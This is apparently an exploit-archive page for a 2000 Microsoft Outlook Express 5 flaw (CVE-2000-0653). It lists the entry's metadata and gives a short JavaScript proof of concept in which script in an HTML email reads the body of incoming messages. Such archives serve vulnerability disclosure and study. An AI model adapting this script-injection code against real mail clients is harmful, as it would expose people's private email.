[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Outlook Express 5 - JavaScript Email Access

Author: Georgi Guninski
type: remote
platform: windows
port: 
date_added: 2000-02-01 
date_updated: 2012-07-10 
verified: 1 
codes: CVE-2000-0653;OSVDB-7902;CVE-2000-0105 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/962/info

Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run.

Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.